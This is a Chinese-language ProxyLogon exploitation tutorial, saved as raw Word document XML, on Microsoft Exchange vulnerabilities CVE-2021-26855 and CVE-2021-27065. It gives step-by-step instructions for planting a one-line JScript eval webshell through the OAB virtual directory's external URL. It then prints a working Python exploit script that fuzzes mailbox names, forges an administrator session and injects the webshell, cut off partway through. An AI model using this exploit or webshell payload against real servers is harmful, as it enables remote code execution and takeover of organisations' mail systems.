        <w:t xml:space="preserve">                &lt;AcceptableResponseSchema&gt;http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a&lt;/AcceptableResponseSchema&gt;</w:t>
        <w:br/>
        <w:t>&lt;/Request&gt;</w:t>
        <w:br/>
        <w:t>&lt;/Autodiscover&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkStart w:name="u3b756a67" w:id="1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34495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>读取 autodiscover.xml</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkStart w:name="u996c7605" w:id="1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4495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Autodiscover(自动发现)是自Exchange Server 2007开始推出的一项自动服务，用于自动配置用户在Outlook中邮箱的相关设置，简化用户登陆使用邮箱的流程。如果用户账户是域账户且当前位于域环境中，通过自动发现功能用户无需输入任何凭证信息即可登陆邮箱。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkStart w:name="u0d3c0335" w:id="1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4495e"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>读取对应账户的legacyDN</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="174"/>
    <w:bookmarkStart w:name="uc2a45156" w:id="175"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u743d84f0" w:id="176"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="209126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00933" cy="41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bookmarkEnd w:id="175"/>
    <w:bookmarkStart w:name="ubc9bcbb7" w:id="1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其中：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="177"/>
    <w:bookmarkStart w:name="u6e9ba891" w:id="178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url中的/ecp/target.js不是绝对的，可以是其他的路径 /ecp/xxxxxxxx.png</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkStart w:name="uc9627fe2" w:id="179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X-BEResource 用于代理请求，其原本格式应该是 [fqdn]~BackEndServerVersion，BackEndServerVersion 应该大于1941962752</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="179"/>
    <w:bookmarkStart w:name="u79809f12" w:id="180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WIN-N15UUJ077R0.saucerman.com:443 为目标地址</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="180"/>
    <w:bookmarkStart w:name="u4609dfb2" w:id="1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fqdn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>完全限定域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（英语：Fully qualified domain name），缩写为FQDN，又译为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>完全资格域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>完整领域名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，又称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>绝对领域名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">（absolute domain name）、 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>绝对域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:hyperlink r:id="rId39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域名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的一种，能指定其在</w:t>
      </w:r>
      <w:hyperlink r:id="rId40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域名系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS) 树状图下的一个确实位置。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="181"/>
    <w:bookmarkStart w:name="Us54F" w:id="18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283444"/>
        </w:rPr>
        <w:t>CVE-2021–27065</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="182"/>
    <w:bookmarkStart w:name="u2b253902" w:id="1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dd1144"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CVE-2021–27065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>是⼀个任意⽂件写⼊漏洞，它需要登陆的管理员账号权限才能触发。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="dd1144"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CVE-2021–26855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>正好可以为我们提供了管理员账号权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="183"/>
    <w:bookmarkStart w:name="u78aa2d41" w:id="1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登录管理员账号后,进入:服务器——&gt;虚拟目录——&gt;OAB</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:bookmarkStart w:name="u4c5bebfc" w:id="185"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:name="u3455362f" w:id="186"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="27748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347200" cy="44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6"/>
    </w:p>
    <w:bookmarkEnd w:id="185"/>
    <w:bookmarkStart w:name="uabda6b3a" w:id="1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编辑OAB配置,在外部链接中写⼊shell并保存。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="187"/>
    <w:bookmarkStart w:name="BczjI" w:id="18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http://aaa/&lt;script language="JScript" runat="server"&gt;function Page_Load(){eval(Request["SD"],"unsafe");}&lt;/script&gt;</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="188"/>
    <w:bookmarkStart w:name="u84709a33" w:id="189"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="ub28fdf4a" w:id="190"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="29791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9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0"/>
    </w:p>
    <w:bookmarkEnd w:id="189"/>
    <w:bookmarkStart w:name="ufdf66dfe" w:id="1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保存后选择重置虚拟目录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>写下shell位置为:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="dd1144"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\sd.aspx</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="191"/>
    <w:bookmarkStart w:name="uace9f144" w:id="192"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u8cbb79f7" w:id="193"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="237181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64134" cy="38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3"/>
    </w:p>
    <w:bookmarkEnd w:id="192"/>
    <w:bookmarkStart w:name="u28ce7269" w:id="194"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u2cb29c9d" w:id="195"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="205033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260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5"/>
    </w:p>
    <w:bookmarkEnd w:id="194"/>
    <w:bookmarkStart w:name="ua2bd54a9" w:id="1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查看shell文件,写入了一句话木马。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="196"/>
    <w:bookmarkStart w:name="u823fcd0f" w:id="197"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u1bd486d2" w:id="198"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841999" cy="28859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381066" cy="463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bookmarkEnd w:id="197"/>
    <w:bookmarkStart w:name="u91162eb5" w:id="1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连接webshell 要忽略屌https证书，才能连接</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="199"/>
    <w:bookmarkStart w:name="u221f0a36" w:id="200"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="u27bfba13" w:id="201"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:ascii="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="39375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1"/>
    </w:p>
    <w:bookmarkEnd w:id="200"/>
    <w:bookmarkStart w:name="Es41h" w:id="202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2f2f2f"/>
        </w:rPr>
        <w:t>SSRF+绕过登录+任意文件写入</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="202"/>
    <w:bookmarkStart w:name="chZZL" w:id="20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 -*- coding: utf-8 -*-</w:t>
        <w:br/>
        <w:t>import requests</w:t>
        <w:br/>
        <w:t>from urllib3.exceptions import InsecureRequestWarning</w:t>
        <w:br/>
        <w:t>import random</w:t>
        <w:br/>
        <w:t>import string</w:t>
        <w:br/>
        <w:t>import argparse</w:t>
        <w:br/>
        <w:t>import sys</w:t>
        <w:br/>
        <w:t>requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>fuzz_email = ['administrator', 'webmaste', 'support', 'sales', 'contact', 'admin', 'test',</w:t>
        <w:br/>
        <w:t xml:space="preserve">              'test2', 'test01', 'test1', 'guest', 'sysadmin', 'info', 'noreply', 'log', 'no-reply']</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>proxies = {}</w:t>
        <w:br/>
        <w:t>user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"</w:t>
        <w:br/>
        <w:t>shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path</w:t>
        <w:br/>
        <w:t># webshell-马子内容</w:t>
        <w:br/>
        <w:t>shell_content = '&lt;script language="JScript" runat="server"&gt; function Page_Load(){/**/eval(Request["code"],"unsafe");}&lt;/script&gt;'</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>final_shell = ""</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>def id_generator(size=6, chars=string.ascii_lowercase + string.digits):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return ''.join(random.choice(chars) for _ in range(size))</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>if __name__=="__main__":</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parser = argparse.ArgumentParser(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        description='Example: python exp.py -u 127.0.0.1 -user administrator -suffix @ex.com\n如果不清楚用户名，可不填写-user参数，将自动Fuzz用户名。')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parser.add_argument('-u', type=str,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        help='target')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parser.add_argument('-user',</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        help='exist email', default='')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    parser.add_argument('-suffix',</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        help='email suffix')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    args = parser.parse_args()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target = args.u</w:t>
        <w:br/>
        <w:t xml:space="preserve">    suffix = args.suffix</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if suffix == "":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        print("请输入suffix")</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">    exist_email = args.user</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if exist_email:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        fuzz_email.insert(0, exist_email)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    random_name = id_generator(4) + ".js"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    print("目标 Exchange Server: " + target)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">    for i in fuzz_email:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        new_email = i+suffix</w:t>
        <w:br/>
        <w:t xml:space="preserve">        autoDiscoverBody = """&lt;Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;Request&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;EMailAddress&gt;%s&lt;/EMailAddress&gt; &lt;AcceptableResponseSchema&gt;http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a&lt;/AcceptableResponseSchema&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/Request&gt;</w:t>
        <w:br/>
        <w:t>&lt;/Autodiscover&gt;</w:t>
        <w:br/>
        <w:t>""" % new_email</w:t>
        <w:br/>
        <w:t xml:space="preserve">        # print("get FQDN")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        FQDN = "EXCHANGE01"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                                            "User-Agent": user_agent},</w:t>
        <w:br/>
        <w:t xml:space="preserve">                      verify=False, proxies=proxies)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">        if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            FQDN = ct.headers["X-FEServer"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("got FQDN:" + FQDN)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={</w:t>
        <w:br/>
        <w:t xml:space="preserve">            "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,</w:t>
        <w:br/>
        <w:t xml:space="preserve">            "Content-Type": "text/xml",</w:t>
        <w:br/>
        <w:t xml:space="preserve">            "User-Agent": user_agent},</w:t>
        <w:br/>
        <w:t xml:space="preserve">            data=autoDiscoverBody,</w:t>
        <w:br/>
        <w:t xml:space="preserve">            proxies=proxies,</w:t>
        <w:br/>
        <w:t xml:space="preserve">            verify=False</w:t>
        <w:br/>
        <w:t xml:space="preserve">        )</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">        if ct.status_code != 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print(ct.status_code)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("Autodiscover Error!")</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">        if "&lt;LegacyDN&gt;" not in str(ct.content):</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("Can not get LegacyDN!")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            legacyDn = str(ct.content).split("&lt;LegacyDN&gt;")[</w:t>
        <w:br/>
        <w:t xml:space="preserve">                1].split(r"&lt;/LegacyDN&gt;")[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("Got DN: " + legacyDn)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            mapi_body = legacyDn + \</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&amp;a=~1942062522;" % FQDN,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Content-Type": "application/mapi-http",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "X-Requesttype": "Connect",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "X-Clientapplication": "Outlook/15.0.4815.1002",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "User-Agent": user_agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
        <w:br/>
        <w:t xml:space="preserve">                data=mapi_body,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                verify=False,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                proxies=proxies</w:t>
        <w:br/>
        <w:t xml:space="preserve">            )</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("Mapi Error!")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                exit()</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            sid = str(ct.content).split("with SID ")[</w:t>
        <w:br/>
        <w:t xml:space="preserve">                1].split(" and MasterAccountSid")[0]</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            print("Got SID: " + sid)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            sid = sid.replace(sid.split("-")[-1], "500")</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve"><![CDATA[            proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>]]></w:t>
        <w:br/>
        <w:t xml:space="preserve">            """ % sid</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Content-Type": "text/xml",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "msExchLogonMailbox": "S-1-5-20",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "User-Agent": user_agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
        <w:br/>
        <w:t xml:space="preserve">                data=proxyLogon_request,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                proxies=proxies,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                verify=False</w:t>
        <w:br/>
        <w:t xml:space="preserve">            )</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if ct.status_code != 241 or not "set-cookie" in ct.headers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("Proxylogon Error!")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                exit()</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            sess_id = ct.headers['set-cookie'].split(</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "ASP.NET_SessionId=")[1].split(";")[0]</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[</w:t>
        <w:br/>
        <w:t xml:space="preserve">                1].split(";")[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("Got session id: " + sess_id)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("Got canary: " + msExchEcpCanary)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={</w:t>
        <w:br/>
        <w:t xml:space="preserve">                # "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&amp;msExchEcpCanary=%s&amp;a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (</w:t>
        <w:br/>
        <w:t xml:space="preserve">                # FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">                "Cookie": "X-BEResource=Admin@{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&amp;schema=VirtualDirectory&amp;msExchEcpCanary={msExchEcpCanary}&amp;a=~1942062522; ASP.NET_SessionId={sess_id}; msExchEcpCanary={msExchEcpCanary1}".</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            format(server_name=FQDN, msExchEcpCanary1=msExchEcpCanary, sess_id=sess_id,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                    msExchEcpCanary=msExchEcpCanary),</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            "Content-Type": "application/json; charset=utf-8",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            "msExchLogonMailbox": "S-1-5-20",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            "User-Agent": user_agent</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            json={"filter": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                "SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}},</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            verify=False,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            proxies=proxies</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            )</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            if ct.status_code != 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("GetOAB Error!")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                exit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]</w:t>
        <w:br/>
        <w:t xml:space="preserve">            print("Got OAB id: " + oabId)</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        "properties": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                        "ExternalUrl": "http://ffff/#%s" % shell_content}}}</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&amp;msExchEcpCanary=%s&amp;a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "msExchLogonMailbox": "S-1-5-20",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "Content-Type": "application/json; charset=utf-8",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                "User-Agent": user_agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
        <w:br/>
        <w:t xml:space="preserve">                json=oab_json,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                proxies=proxies,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                verify=False</w:t>
        <w:br/>
        <w:t xml:space="preserve">            )</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if ct.status_code != 200:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                print("Set external url Error!")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                exit()</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t xml:space="preserve">            reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            "properties": {</w:t>
        <w:br/>
